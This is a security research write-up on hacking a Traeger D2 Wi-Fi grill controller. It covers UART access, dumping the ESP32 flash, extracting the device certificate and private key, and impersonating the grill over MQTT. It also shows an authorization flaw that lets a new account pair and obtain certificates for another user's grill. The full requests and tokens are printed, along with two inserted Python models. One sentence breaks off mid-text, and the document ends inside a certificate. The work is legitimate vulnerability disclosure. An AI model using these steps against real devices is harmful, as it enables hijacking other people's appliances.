Product Security Review Methodology: A Technical Analysis of the Traeger Grill Hack
In this post we walk through our product security review methodology to give additional background on how Bishop Fox staff discovered the vulnerabilities in the Traeger D2 Wi-Fi Controller.
After receiving the device, Bishop Fox staff removed the printed circuit board (PCB) from its enclosure and examined the components on the board. The PCB carries an ESP32 module and a 10-pin header.
Figure 1 - 10-pin header on the Traeger board
The module's pinout is documented in the ESP32 datasheet, as shown below:
Figure 2 - ESP32-WROVER-E pinout
As the figure shows, the TXD0 and RXD0 pins carry the UART0 connection. Tracing the board, these UART pins appeared to be routed to the 10-pin header. To confirm this, Bishop Fox staff used a multimeter to check for continuity between the ESP32's transmit and receive UART pins and the 10-pin header, as shown below:
Figure 3 - Continuity check between the 10-pin header and the ESP32 UART pins, reading 100 ohms
As shown above, the multimeter read 100 ohms, indicating continuity between the transmit/receive UART pins and the 10-pin header. The 100 ohms is most likely the series resistors on the back of the board, which appear to sit in the path of the UART lines.
Figure 4 - Resistors on the back of the board that account for the measured resistance
Bishop Fox staff then wired the hardware correctly: the ESP32's UART transmit pin to the receive pin of an Attify Badge, the ESP32's UART receive pin to the badge's transmit pin (TX crossed to RX in both directions), and the two boards' grounds tied together.
Figure 5 - UART wired to the UART debug bridge
Next, Bishop Fox staff monitored the serial connection with picocom at 115200 baud and observed the following output once the device booted:
% sudo ~/Tools/picocom/picocom -b 115200 /dev/cu.usbserial-2
picocom v3.2a
…snip…
Terminal ready
ets Jul 29 2019 12:21:46
rst:0x1 (POWERON_RESET),boot:0x17 (SPI_FAST_FLASH_BOOT)
configsip: 0, SPIWP:0xee
clk_drv:0x00,q_drv:0x00,d_drv:0x00,cs0_drv:0x00,hd_drv:0x00,wp_drv:0x00
mode:DIO, clock div:2
load:0x3fff0018,len:4
load:0x3fff001c,len:5736
load:0x40078000,len:7916
load:0x40080000,len:5908
entry 0x40080314
I (29) boot: ESP-IDF v3.1.3-51-g39c6b2f90 2nd stage bootloader
I (29) boot: compile time 12:02:40
I (30) boot: Enabling RNG early entropy source...
I (35) boot: SPI Speed : 40MHz
I (39) boot: SPI Mode : DIO
I (43) boot: SPI Flash Size : 4MB
I (47) boot: Partition Table:
I (51) boot: ## Label Usage Type ST Offset Length
I (58) boot: 0 nvs WiFi data 01 02 00009000 00010000
I (66) boot: 1 otadata OTA data 01 00 00019000 00002000
I (73) boot: 2 factory factory app 00 00 00020000 00100000
I (80) boot: 3 ota_0 OTA app 00 10 00120000 00100000
I (88) boot: 4 ota_1 OTA app 00 11 00220000 00100000
I (95) boot: 5 storage Unknown data 01 82 00320000 000e0000
I (103) boot: End of partition table
I (107) esp_image: segment 0: paddr=0x00120020 vaddr=0x3f400020 size=0x2dee4 (188132) map
I (181) esp_image: segment 1: paddr=0x0014df0c vaddr=0x3ffb0000 size=0x02104 ( 8452) load
I (185) esp_image: segment 2: paddr=0x00150018 vaddr=0x400d0018 size=0xb4448 (738376) map
I (444) esp_image: segment 3: paddr=0x00204468 vaddr=0x3ffb2104 size=0x04714 ( 18196) load
I (451) esp_image: segment 4: paddr=0x00208b84 vaddr=0x40080000 size=0x00400 ( 1024) load
I (452) esp_image: segment 5: paddr=0x00208f8c vaddr=0x40080400 size=0x11714 ( 71444) load
I (499) boot: Loaded app from partition at offset 0x120000
I (499) boot: Disabling RNG early entropy source...
I (500) cpu_start: Pro cpu up.
I (503) cpu_start: Starting app cpu, entry point is 0x40081128
I (0) cpu_start: App cpu up.
I (514) heap_init: Initializing. RAM available for dynamic allocation:
I (521) heap_init: At 3FFAE6E0 len 00001920 (6 KiB): DRAM
I (527) heap_init: At 3FFD0C30 len 0000F3D0 (60 KiB): DRAM
I (533) heap_init: At 3FFE0440 len 00003BC0 (14 KiB): D/IRAM
I (539) heap_init: At 3FFE4350 len 0001BCB0 (111 KiB): D/IRAM
I (545) heap_init: At 40091B14 len 0000E4EC (57 KiB): IRAM
I (552) cpu_start: Pro cpu start user code
I (234) cpu_start: Starting scheduler on PRO CPU.
…snip…
As shown above, the UART connection came up and the device's boot log was printed to the terminal. In addition, holding the ESP32's GPIO0 strapping pin low while the chip resets forces it into serial download (bootloader) mode, which is what ultimately allowed Bishop Fox staff to recover the device's firmware.
With the UART connection established, Bishop Fox staff began interacting with the device and reviewing what it logged. During pairing, the grill hosts an HTTP server that handles the initial communication with the mobile application. To demonstrate this, Bishop Fox staff captured the HTTP traffic between the mobile device and the grill:
Request
POST /prod/pairing-sessions HTTP/2
Host: 1ywgyc65d1.execute-api.us-west-2.amazonaws.com
Authorization: COGNITO_TOKEN
…snip…
{"lat":37.421998,"long":-122.084,"thingName":"803428743EA7"}
Response
HTTP/2 200 OK
Content-Type: application/json
…snip…
{"pairingToken":"fde5f0f06d4aad2bd11d6ad66272fdeae2fa3c0ce8d9227a92ef8148fdddc8fc","thingName":"803428743EA7"}
As shown above, the mobile device first retrieves a pairing token for the grill, identified by the grill ID (thingName) 803428743EA7. With the token in hand, the mobile app prompts the user to join the grill's own Wi-Fi network so that it can hand over the home network details and the pairing token.
Request
GET /connect.html HTTP/1.1
Host: mytraegergrill.net
AWS-Pairing-Token: fde5f0f06d4aad2bd11d6ad66272fdeae2fa3c0ce8d9227a92ef8148fdddc8fc
…snip…
Response
HTTP/1.1 200 OK
Content-Type: text/json
{"networks": [{"ssid": "GrillMasterWiFi","sec_type": 3,"rssi": -46}
…snip…
The response above tells the mobile client which networks the grill can see and join through its Wi-Fi interface. The mobile app then issues an additional POST request to hand the pairing token to the grill.
Request
POST /pairingtoken.html HTTP/1.1
AWS-Pairing-Token: fde5f0f06d4aad2bd11d6ad66272fdeae2fa3c0ce8d9227a92ef8148fdddc8fc
…snip…
__SL_P_UN1=fde5f0f06d4aad2bd11d6ad66272fdea&__SL_P_UN2=e2fa3c0ce8d9227a92ef8148fdddc8fc
Response
The parameters in the request above show the 64-character pairing token split into two 32-character halves (__SL_P_UN1 and __SL_P_UN2). The mobile app then shares the network details that allow the grill to join the home network:
Request
POST /nothing.html HTTP/1.1
Host: mytraegergrill.net
AWS-Pairing-Token: fde5f0f06d4aad2bd11d6ad66272fdeae2fa3c0ce8d9227a92ef8148fdddc8fc
…snip…
__SL_P_USE=2&__SL_P_USD= GrillMasterWiFi&__SL_P_USG=1&__SL_P_USF=[REDACTED Wi-Fi Password]&__SL_P_USC=Add
Response
Once it has the network details, the grill joins the specified Wi-Fi network and registers itself with AWS IoT. Notably, the registration exchange is TLS-encrypted, but Bishop Fox staff bypassed that protection by patching the firmware to downgrade the connection to plain HTTP. The registration can be seen in the intercepted request below:
Request
POST /certs HTTP/2
Host: durable-api.iot.traegergrills.io
Authorization: fde5f0f06d4aad2bd11d6ad66272fdeae2fa3c0ce8d9227a92ef8148fdddc8fc
…snip…
{
"thingName": "803428743EA7",
"csr": "-----BEGIN CERTIFICATE REQUEST-----\nMIICgTCCAWkCAQAwPDELMAkGA1UEBhMCVVMxEDAOBgNVBAoTB1RyYWVnZXIxGzAZ\nBgNVBAMTElRyYWVnZXIgSW9UIERldmljZTCCASIwDQYJKoZIhvcNAQEBBQADggEP\nADCCAQoCggEBAL4O20OYw2mDbk1kH/0cZ3h3ZxQhrYvZcPrQLBhsQOJ+c3D22ps9\ngAkf0j6XsOU7pIHX+xPDOpODaWX7OPq37RGjne8YbYy1p9PnMHYpnyajaCkXCjlW\nnWSJv51Cu36OBah4SAv+wd3v1l4oOXCFfiwAqobvqTxouKs1TkB47fRBSkI2OrLq\nR2qbYxZkCfi2lJiL3Gf/eB+1+uZumYYtjkKXe+WKGsbMw95aUr6BjX6i9Vv2x5lN\nKA8IEYDFZZ3vsxJUAbD0suh1Bmm6zRT9VmAbg65zWQMDaQi8T08hKVz1//rRqqo+\n3WffHdORnB6AyHTkiBizrTCmbJ1x2Dk06+UCAwEAAaAAMA0GCSqGSIb3DQEBCwUA\nA4IBAQADCxk3uJqgL9uquOGwXpaqCP34wASDulMitICb2FWy6IRQT9jfhpZufAjn\n43VU8QOPx3TGiAbQHmRWoN/D0y3+eGEytZ/UOvBAukclfQcsiGtz9wm77rT4oLsP\nXsu3cCfwKU90jUbAIKD/qjvVni7nF6EKpS70iwUn+0QVwGY5LlCyurdRKmH82ebP\nBctw3EviPOyv2XkjwEQTrfA26XNqv5RMewa951q7mZDLzP1KDWFXhR5aj+h7VKIS\nz5wzuh3/dXOjSvuSpMBqYKrKoG2bi2ItgoPS3uDT5i5BhldOTKiPo9w4UR3YyE1o\nCUIwgSarsz/b9ZtfO3CddRY1WFvx\n-----END CERTIFICATE REQUEST-----\n"
}
Response
HTTP/2 200 OK
Content-Type: application/json
…snip…
{"certificate":"-----BEGIN CERTIFICATE-----\nMIIDeDCCAmCgAwIBAgIVAL3s+ljpusLF05NHOtmnYD3f5D8pMA0GCSqGSIb3DQEB\nCwUAME0xSzBJBgNVBAsMQkFtYXpvbiBXZWIgU2VydmljZXMgTz1BbWF6b24uY29t\nIEluYy4gTD1TZWF0dGxlIFNUPVdhc2hpbmd0b24gQz1VUzAeFw0yMzEyMjUxNjMy\nMDRaFw00OTEyMzEyMzU5NTlaMDwxCzAJBgNVBAYTAlVTMRAwDgYDVQQKEwdUcmFl\nZ2VyMRswGQYDVQQDExJUcmFlZ2VyIElvVCBEZXZpY2UwggEiMA0GCSqGSIb3DQEB\nAQUAA4IBDwAwggEKAoIBAQC+DttDmMNpg25NZB/9HGd4d2cUIa2L2XD60CwYbEDi\nfnNw9tqbPYAJH9I+l7DlO6SB1/sTwzqTg2ll+zj6t+0Ro53vGG2MtafT5zB2KZ8m\no2gpFwo5Vp1kib+dQrt+jgWoeEgL/sHd79ZeKDlwhX4sAKqG76k8aLirNU5AeO30\nQUpCNjqy6kdqm2MWZAn4tpSYi9xn/3gftfrmbpmGLY5Cl3vlihrGzMPeWlK+gY1+\novVb9seZTSgPCBGAxWWd77MSVAGw9LLodQZpus0U/VZgG4Ouc1kDA2kIvE9PISlc\n9f/60aqqPt1n3x3TkZwegMh05IgYs60wpmydcdg5NOvlAgMBAAGjYDBeMB8GA1Ud\nIwQYMBaAFK5LcpMC+tMMCts/MFF8rCzyeGBbMB0GA1UdDgQWBBRlT2pg4UoHtTrF\nSckFkVZwPofFxjAMBgNVHRMBAf8EAjAAMA4GA1UdDwEB/wQEAwIHgDANBgkqhkiG\n9w0BAQsFAAOCAQEAmad1qCwQYzhAR7VqEHhI4X5p6yVQ+cSS6AF1a/zpPKJppwPQ\nStDCF9ewjZlsE9o6qnClOQV9UgCaxJmX6ZHHjEitPnF+jIafDlYOxboXGxh2Z661\n4sGsK3VEStfjNtnN10GdETAG7ThWmVXxOYml+ybWDUy2l9iw/pq6uuAZEtjcUxlh\nSQl9jphjMjadRYAPtoegBnCGvdpDGmnz90b9aIu7U1wCcgV7QEKX+xHArCH+e9Mr\nItUCrKpFXybhzBPtbLp/4s2fa9KsX5s5WshIrq9Q/Ee/a0rWqO2HwV+erWg87uGc\n1Vr8lRPuSWKwxqYG/Z35IS5gzUkhy0q1qJVjDg==\n-----END CERTIFICATE-----\n"}
The certificate returned by the /certs API is then downloaded and used by the device as its client certificate for MQTT over TLS (mqtts) to the backend. The UART debug log that Bishop Fox staff captured during pairing confirms this:
(364403) OtaDownloadInterface: HTTP POST data:
{
"thingName": "803428743EA7",
"csr": "-----BEGIN CERTIFICATE REQUEST-----\nMIICgTCCAWkCAQAwPDELMAkGA1UEBhMCVVMxEDAOBgNVBAoTB1RyYWVnZXIxGzAZ\nBgNVBAMTElRyYWVnZXIgSW9UIERldmljZTCCASIwDQYJKoZIhvcNAQEBBQADggEP\nADCCAQoCggEBANAAmIO52U4v1K9DSUfbFL8jSMR/lUQzOch8cNtY9Dd99uyESIw1\ncyHHFgY5ZZWhdzxQWs3/OkDNURvZ/BLkQ++z0qQNTGDdeR+N7Rmb7d8xYkDEkMM6\nmEY9am/3BpfV0b9g7BMo+M410OrAqPCX/CZ01KqdHxCesBQNff81FYr3ccfouvZi\ngoUL8CaE4t98P7KvAOD2r8jXCGsZpMdbkFQbg5dB1fyWPr7qoJ+1l1xYNhRd80Ft\nsoy5Z2ZwAaDCqSsbLavDNnWYDV49PHVZ4PWckFrH6qVhJT+xGQEsutJB2Bf6HhgW\nRuweXAOFsQcb6M1HgW/JdfdvWF0O5KGSwPsCAwEAAaAAMA0GCSqGSIb3DQEBCwUA\nA4IBAQAAhSzZlfx54gzRSZHIg1rvRPN6/f6QSwoJVjRDSv85RTRXhR7znwPBX25e\nH547VKXH3wwu0vvboVFqFf+3AMyt9pIFJ5WMsj6BwgrOTVSqnmltWblvOJfWnK3V\nBGkWB+3OmgcHTx9kmg7NWGGtp0rldugy5h0Yr9cagvfDoV+3XvvFsfbtM1VT75Pg\n7xw6g2bhcBLtTSFUFRQ08PY6M4Sf93p7fyDO1M/Wff8SHy/heIr2Gbirp/+2WlDn\n4yLj4RHMiRqxEfcZSPOGmfIBIUqWxSUnKhGtGrVFgy8ybI7hwgtVuGRNcaNirB40\nrKMQ0/2eBV34A7u8kRiHG8Hbvgkr\n-----END CERTIFICATE REQUEST-----\n"
}
I (364507) OtaDownloadInterface: Connecting to https://durable-api.iot.traegergrills.io/certs
…snip…
(366949) OtaDownloadInterface: HTTP_EVENT_ON_CONNECTED
D (366953) OtaDownloadInterface: Writing POST data
…snip…
OtaDownloadInterface: HTTP_EVENT_ON_HEADER
D (368109) OtaDownloadInterface: HTTP_EVENT_ON_DATA, len=432
I (368341) FILE SYSTEM: File clientCert.pem exists: 0, File in use: 0
D (368541) OtaDownloadInterface: HTTP_EVENT_ON_DATA, len=512
D (368541) OtaDownloadInterface: HTTP_EVENT_ON_DATA, len=356
D (368542) OtaDownloadInterface: Writing value for certificate to file
…snip…
I (368658) FILE SYSTEM: File path = /spiffs/clientCert.pem
I (368664) FILE SYSTEM: Writing file
I (368720) FILE SYSTEM: Opened file for write (binary mode): /spiffs/clientCert.pem
D (368827) OtaDownloadInterface: HTTP_EVENT_DISCONNECTED
D (368830) OtaDownloadInterface: HTTP_EVENT_DISCONNECTED
I (368830) OtaDownloadInterface: Download completed cleanly: true.
I (368836) FILE SYSTEM: Closed file: clientCert.pem
I (368939) MqttConnectAndRun: Attempt #1 Cert download succeeded
As shown above, during pairing the device generated a certificate signing request (CSR) and POSTed it to the /certs API. The API responded with a signed certificate, which the device downloaded and wrote to /spiffs/clientCert.pem. The MQTT client then uses that certificate to open an encrypted, client-authenticated channel to the backend.
At a high level, MQTT follows a publish/subscribe model: clients connect to a broker, subscribers register interest in topics, and the broker delivers every message published to a topic to that topic's subscribers. On boot, the grill therefore connects to the broker over mqtts (MQTT over TLS) and consumes the messages, including grill commands, published to its topics.
To demonstrate this, Bishop Fox staff impersonated the grill's MQTT client by extracting the issued certificate and its private key from the firmware and connecting to the broker with an MQTT client of their own. Because the firmware lives in the ESP32's SPI flash, esptool.py was used to read it out over the hardware connection described above. The same tool also confirmed the flash size, as shown below:
sudo esptool.py --port /dev/cu.usbserial-2 flash_id
esptool.py v4.7.0
Serial port /dev/cu.usbserial-2
Connecting.....
Detecting chip type... Unsupported detection protocol, switching and trying again...
Connecting...
Detecting chip type... ESP32
Chip is ESP32-D0WD-V3 (revision v3.0)
Features: WiFi, BT, Dual Core, 240MHz, VRef calibration in efuse, Coding Scheme None
Crystal is 40MHz
MAC: 34:94:54:4a:97:54
Uploading stub...
Running stub...
Stub running...
Manufacturer: 20
Device: 4016
Detected flash size: 4MB
Hard resetting via RTS pin...
With the flash size confirmed, Bishop Fox staff used esptool.py to dump the full 4 MB of flash:
% sudo esptool.py --port /dev/cu.usbserial-2 read_flash 0 0x400000 flash_contents.bin
esptool.py v4.7.0
Serial port /dev/cu.usbserial-2
Connecting...
Detecting chip type... Unsupported detection protocol, switching and trying again...
Connecting...
Detecting chip type... ESP32
Chip is ESP32-D0WD-V3 (revision v3.0)
Features: WiFi, BT, Dual Core, 240MHz, VRef calibration in efuse, Coding Scheme None
Crystal is 40MHz
MAC: 34:94:54:4a:97:54
Stub is already running. No upload is necessary.
4194304 (100 %)
4194304 (100 %)
Read 4194304 bytes at 0x00000000 in 387.7 seconds (86.6 kbit/s)...
Hard resetting via RTS pin...
Per the ESP32 documentation, the flash is divided into partitions so that several applications and data regions can be stored on the device. Conveniently, tooling exists to extract the partition table and the individual partitions from a flash dump. Using esp32_image_parser.py, Bishop Fox staff listed the partition table, as shown below:
% python3 ~/Tools/esp32_image_parser/esp32_image_parser.py show_partitions flash_contents.bin
reading partition table...
entry 0:
label : nvs
offset : 0x9000
length : 65536
type : 1 [DATA]
sub type : 2 [WIFI]
…snip…
entry 4:
label : ota_1
offset : 0x220000
length : 1048576
type : 0 [APP]
sub type : 17 [ota_1]
entry 5:
label : storage
offset : 0x320000
length : 917504
type : 1 [DATA]
sub type : 130 [unknown]
The certificate lives in the storage partition, which starts at flash offset 0x320000. (Data subtype 0x82 is SPIFFS in ESP-IDF; the parser simply has no name for it.)
% python3 ~/Tools/esp32_image_parser/esp32_image_parser.py dump_partition ./flash_contents.bin -p storage
Dumping partition 'storage' to storage_out.bin
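To make the partition-table step concrete, here is an added Python example (not part of the original post, and not the code of esp32_image_parser) that decodes the ESP-IDF partition table straight from a flash dump and carves out a partition by label. It runs on a constructed 4 MB image laid out exactly like the table above; the `SPIFFS00` marker written into the storage area is a stand-in for real SPIFFS content, and a real dump would be passed in as the bytes of `flash_contents.bin` instead.

```python
import struct

# ESP-IDF partition-table layout: the table sits at flash offset 0x8000 and is a
# series of 32-byte entries, each opening with the magic 0x50AA (little-endian).
TABLE_OFFSET = 0x8000
ENTRY_FMT = "<HBBII16sI"   # magic, type, subtype, offset, size, label, flags
ENTRY_MAGIC = 0x50AA

TYPE_NAMES = {0: "app", 1: "data"}
SUBTYPE_NAMES = {
    (0, 0x00): "factory", (0, 0x20): "test",
    (1, 0x00): "ota", (1, 0x01): "phy", (1, 0x02): "nvs", (1, 0x03): "coredump",
    (1, 0x04): "nvs_keys", (1, 0x05): "efuse", (1, 0x81): "fat", (1, 0x82): "spiffs",
}


def subtype_name(ptype, subtype):
    # App subtypes 0x10..0x1F are the OTA slots ota_0..ota_15.
    if ptype == 0 and 0x10 <= subtype < 0x20:
        return f"ota_{subtype - 0x10}"
    return SUBTYPE_NAMES.get((ptype, subtype), f"unknown(0x{subtype:02x})")


def parse_partition_table(flash, table_offset=TABLE_OFFSET):
    """Walk entries until the first slot without the entry magic (0xFF fill or the MD5 record)."""
    entries, pos = [], table_offset
    while pos + 32 <= len(flash):
        magic, ptype, subtype, offset, size, label, flags = struct.unpack_from(ENTRY_FMT, flash, pos)
        if magic != ENTRY_MAGIC:
            break
        entries.append({
            "label": label.rstrip(b"\0").decode(),
            "type": TYPE_NAMES.get(ptype, str(ptype)),
            "subtype": subtype_name(ptype, subtype),
            "offset": offset,
            "size": size,
            "encrypted": bool(flags & 1),   # flash-encryption flag bit
        })
        pos += 32
    return entries


def carve_partition(flash, label, table_offset=TABLE_OFFSET):
    """Return the raw bytes of the named partition (what dump_partition writes out)."""
    for entry in parse_partition_table(flash, table_offset):
        if entry["label"] == label:
            return flash[entry["offset"]:entry["offset"] + entry["size"]]
    raise KeyError(f"no partition labelled {label!r}")


# Constructed sample: same six partitions the boot log and esp32_image_parser
# reported for the controller (type, subtype, offset, size, label).
LAYOUT = [
    (1, 0x02, 0x009000, 0x010000, b"nvs"),
    (1, 0x00, 0x019000, 0x002000, b"otadata"),
    (0, 0x00, 0x020000, 0x100000, b"factory"),
    (0, 0x10, 0x120000, 0x100000, b"ota_0"),
    (0, 0x11, 0x220000, 0x100000, b"ota_1"),
    (1, 0x82, 0x320000, 0x0E0000, b"storage"),
]


def build_sample_flash():
    flash = bytearray(b"\xff" * 0x400000)          # erased 4 MB flash
    for i, (ptype, subtype, off, size, label) in enumerate(LAYOUT):
        struct.pack_into(ENTRY_FMT, flash, TABLE_OFFSET + 32 * i,
                         ENTRY_MAGIC, ptype, subtype, off, size, label, 0)
    flash[0x320000:0x320008] = b"SPIFFS00"          # marker standing in for SPIFFS data
    return bytes(flash)


if __name__ == "__main__":
    # For a real dump: img = open("flash_contents.bin", "rb").read()
    img = build_sample_flash()
    for e in parse_partition_table(img):
        print(f"{e['label']:<8} {e['type']:<5} {e['subtype']:<8} 0x{e['offset']:06x} 0x{e['size']:06x}")
    print(carve_partition(img, "storage")[:8])
```

The subtype mapping is the detail worth keeping: the boot log's `ST 82` for `storage` is SPIFFS, which is why mkspiffs is the right tool for the next step.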
After extracting the storage partition, Bishop Fox staff unpacked the SPIFFS image with mkspiffs to retrieve the certificate:
% ~/Tools/mkspiffs/mkspiffs ./storage_out.bin -u ./dest
Directory ./dest does not exists. Try to create it.
/currentConfig.txt > ./dest/currentConfig.txtsize: 1398 Bytes
/clientCert.key > ./dest/clientCert.keysize: 1679 Bytes
/clientCert.pub > ./dest/clientCert.pubsize: 451 Bytes
/clientCert.pem > ./dest/clientCert.pemsize: 1261 Bytes
As shown above, the client certificate, along with its private key and the device configuration, was successfully recovered from the firmware.
Next, Bishop Fox staff used mqttx, an MQTT client, to impersonate the grill and connect to the API endpoint. The client was configured to establish a secure mqtts connection using the extracted certificate and key.
Figure 6 - Configured mqttx client
Bishop Fox staff also subscribed the client to the prod/803428743EA7/run_cmd topic, which the grill uses to receive commands. To validate the connection, Bishop Fox staff launched the mobile app and intercepted a command.
Request
POST /prod/things/803428743EA7/commands HTTP/2
Host: 1ywgyc65d1.execute-api.us-west-2.amazonaws.com
Authorization: [COGNITO_TOKEN]
…snip…
{
"command" : "112,60"
}
Response
HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
…snip…
{}
Bishop Fox staff then observed the command arriving at the mqttx client:
Figure 7 - Client impersonating the grill successfully receives the command
With this working connection, Bishop Fox staff could now test for authorization issues and verify whether the grill would accept commands from an unauthorized user. To do so, Bishop Fox staff registered a brand-new Traeger account through the mobile app. Using that new account, they then attempted to register the grill under an account that should not have had access to it:
Request
POST /prod/pairing-sessions HTTP/2
Host: 1ywgyc65d1.execute-api.us-west-2.amazonaws.com
Authorization: [NEW_COGNITO_TOKEN]
…snip…
{"thingName":"803428743EA7"}
Response
HTTP/2 200 OK
Content-Type: application/json
…snip…
{"pairingToken":"33e6099c4d36a84e7081954624110d1921d281f3d6d8766410ef4a21604644e9","thingName":"803428743EA7"}
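The exchange above is the core of the authorization problem: a pairing session was issued for a thingName that another account had already paired, and (as the next request shows) that token was enough to have a certificate signed. The following added Python model is constructed for this write-up; it is not Traeger's backend code and not a description of their fix. With `strict=False` it reproduces the observed behaviour; with `strict=True` it adds the ownership check, single-use token and CA-assigned subject that would have refused the second account. The account names, the `PairingError` type and the `CN=<thingName>` subject are assumptions for illustration.

```python
import secrets
from dataclasses import dataclass, field


class PairingError(Exception):
    """Where a hardened backend would answer 403 (assumed error type)."""


@dataclass
class PairingBackend:
    """Toy model of POST /prod/pairing-sessions and POST /certs."""
    strict: bool = False
    owners: dict = field(default_factory=dict)    # thingName -> first account that paired it
    sessions: dict = field(default_factory=dict)  # pairingToken -> [account, thingName, consumed]

    def create_pairing_session(self, account, thing_name):
        """Caller is authenticated (Cognito token) as `account`; body names the grill."""
        owner = self.owners.get(thing_name)
        if self.strict and owner is not None and owner != account:
            # Hardened: a paired grill cannot be re-claimed by a stranger without an
            # explicit unpair by the owner (or proof of physical possession) first.
            raise PairingError("thingName already paired to another account")
        token = secrets.token_hex(32)                 # 64 hex chars, like the page's tokens
        self.sessions[token] = [account, thing_name, False]
        return token

    def issue_cert(self, token, thing_name, csr_subject):
        """Authorization: <pairingToken>; body carries thingName and a CSR."""
        session = self.sessions.get(token)
        if session is None or session[1] != thing_name:
            raise PairingError("pairing token does not match thingName")
        account, _, consumed = session
        if self.strict:
            if consumed:
                raise PairingError("pairing token already used")
            session[2] = True
            subject = f"CN={thing_name}"   # CA assigns identity; CSR subject is ignored
        else:
            subject = csr_subject          # observed: whatever the CSR says gets signed
        self.owners.setdefault(thing_name, account)
        return {"thingName": thing_name, "subject": subject, "issued_to": account}


def takeover_attempt(strict):
    """Account 'owner' pairs the grill; 'new-account' then tries the same thingName.
    Returns the account a certificate was issued to, or None if the backend refused."""
    backend = PairingBackend(strict=strict)
    grill = "803428743EA7"
    backend.issue_cert(backend.create_pairing_session("owner", grill), grill, "CN=Traeger IoT Device")
    try:
        token = backend.create_pairing_session("new-account", grill)
        return backend.issue_cert(token, grill, "CN=bob")["issued_to"]
    except PairingError:
        return None


def strict_subject():
    """Subject a hardened backend would put in the certificate regardless of the CSR."""
    backend = PairingBackend(strict=True)
    token = backend.create_pairing_session("owner", "803428743EA7")
    return backend.issue_cert(token, "803428743EA7", "CN=bob")["subject"]


if __name__ == "__main__":
    print("lax backend issued cert to:", takeover_attempt(False))
    print("strict backend issued cert to:", takeover_attempt(True))
    print("strict subject:", strict_subject())
```

The point of the model is the decision boundary: the observed backend authenticates the caller and binds the token to a thingName, but never asks whether the caller is allowed to claim that thingName, and it signs the CSR's subject as submitted.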
As shown above, Bishop Fox staff retrieved a fresh pairingToken for the grill while specifying the same grill ID. Next, they sent a follow-up request to the /certs API to complete the pairing process, submitting a CSR they had generated themselves (note the OpenSSL default subject fields in the resulting certificate) to show that a device-generated CSR is not required.
Request
POST /certs HTTP/2
Host: durable-api.iot.traegergrills.io
Authorization: 33e6099c4d36a84e7081954624110d1921d281f3d6d8766410ef4a21604644e9
…snip…
{
"thingName": "803428743EA7",
"csr": "-----BEGIN CERTIFICATE REQUEST-----\n…snip…\n-----END CERTIFICATE REQUEST-----\n"
}
Response
HTTP/2 200 OK
Content-Type: application/json
…snip…
{"certificate":"-----BEGIN CERTIFICATE-----\nMIIDnjCCAoagAwIBAgIULItWQDaaBwZJXb9djdZQZIU4b7owDQYJKoZIhvcNAQEL\nBQAwTTFLMEkGA1UECwxCQW1hem9uIFdlYiBTZXJ2aWNlcyBPPUFtYXpvbi5jb20g\nSW5jLiBMPVNlYXR0bGUgU1Q9V2FzaGluZ3RvbiBDPVVTMB4XDTIzMTIyODE1NDQ1\nNloXDTQ5MTIzMTIzNTk1OVowYzELMAkGA1UEBhMCVVMxCzAJBgNVBAgMAkhXMQow\nCAYDVQQHDAFhMSEwHwYDVQQKDBhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGQxCjAI\nBgNVBAsMAWQxDDAKBgNVBAMMA2JvYjCCASIwDQYJKoZIhvcNAQEBBQADggEPADCC\nAQoCggEBAPueyA6os9H7V7T65nd8rm5mTrbpSSFYFheRYN3aaZ8gvROWUJnz3b6E\nKKzSwBWaQCJEAY1fMsicAMuOpq+u6YMFq1utda4uLaVRzGfbJBIKMOAAYaoC/lp8\niwA0Z3HRUWx/kVO2shBal7mm7kgq+i9vGf/k2qG2Phx/aqvcaJpsKskTt9pz5GdY\npBKav8FEg2YW601JXEY4+MIylDbU3Y0DAdSftYzaYk7Ol64eqGz/1DRaww5VNAaR\nz5TdIYaKbalphLr7rPwaui76pmbgNLXzMXnhwQeh4nwn0ObdwWX+OOBRTmKM8vg6\nr+AqRR4tkZFX7qGU3rXsC3S29lA48I8CAwEAAaNgMF4wHwYDVR0jBBgwFoAUy24K\n2Wfaa9J+S7BMJ/Wv+esVvlEwHQYDVR0OBBYEFIwGcb+YrXxEOZcPPiFmkclhSGLT\nMAwGA1UdEwEB/wQCMAAwDgYDVR0PAQH/BAQDAgeAMA0GCSqGSIb3DQEBCwUAA4IB\nAQB1GEi1fKXwUgBI0VDZ0RFVSQCtFH1MeMPE+htPOuoxBvztefiywDozQR4V2no8\nEmxDp5a4W/9Y0Xs+PAXU1AtgpfQWpwR0sxcdOSPW8x6jNv9f5Laj+mcbiQapw1ab\n5BjizgV4eKCTrUYC37oFN/kAmwZDDw+0s4a1VfO2vvy43/YtYsPUk840moPywoz+\n9aIJwgXFqmmt3YNwV5hRg0c7VXbfW2zy50BuqZlU9jDyu5d88u3xU3M1YHTbTGDp\nhg4ByM52/Ve9zs/Ge0nGQuXM8gE1lNZvYsDxVvCQlJSRgGU+EypSGt7UjSOvIwu6\nrnMvo4g8qaJVN4okrnQdqLzW\n-----END CERTIFICATE-----\n"}
As shown above, the API accepted the request and issued a certificate. Moreover, this did not disturb the certificate configuration of the grill's existing mqtts connection, since the device could still connect. After calling /certs
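The two certificates returned by /certs (the first for the grill's own CSR, the second for the CSR submitted from the new account) make the issuance behaviour easy to check. The added Python example below is not part of the original post; it walks the DER structure of both certificates with the standard library only and pulls out issuer, validity and subject. It shows that the subject is taken verbatim from the CSR (the second certificate carries OpenSSL's default `Internet Widgits Pty Ltd` / `bob` fields), that both were signed by the same AWS IoT issuer, and that both are valid until the end of 2049. The PEM strings are copied from the two responses above.

```python
import base64

# Copied from the two /certs responses shown on this page.
DEVICE_CERT_PEM = """-----BEGIN CERTIFICATE-----
MIIDeDCCAmCgAwIBAgIVAL3s+ljpusLF05NHOtmnYD3f5D8pMA0GCSqGSIb3DQEB
CwUAME0xSzBJBgNVBAsMQkFtYXpvbiBXZWIgU2VydmljZXMgTz1BbWF6b24uY29t
IEluYy4gTD1TZWF0dGxlIFNUPVdhc2hpbmd0b24gQz1VUzAeFw0yMzEyMjUxNjMy
MDRaFw00OTEyMzEyMzU5NTlaMDwxCzAJBgNVBAYTAlVTMRAwDgYDVQQKEwdUcmFl
Z2VyMRswGQYDVQQDExJUcmFlZ2VyIElvVCBEZXZpY2UwggEiMA0GCSqGSIb3DQEB
AQUAA4IBDwAwggEKAoIBAQC+DttDmMNpg25NZB/9HGd4d2cUIa2L2XD60CwYbEDi
fnNw9tqbPYAJH9I+l7DlO6SB1/sTwzqTg2ll+zj6t+0Ro53vGG2MtafT5zB2KZ8m
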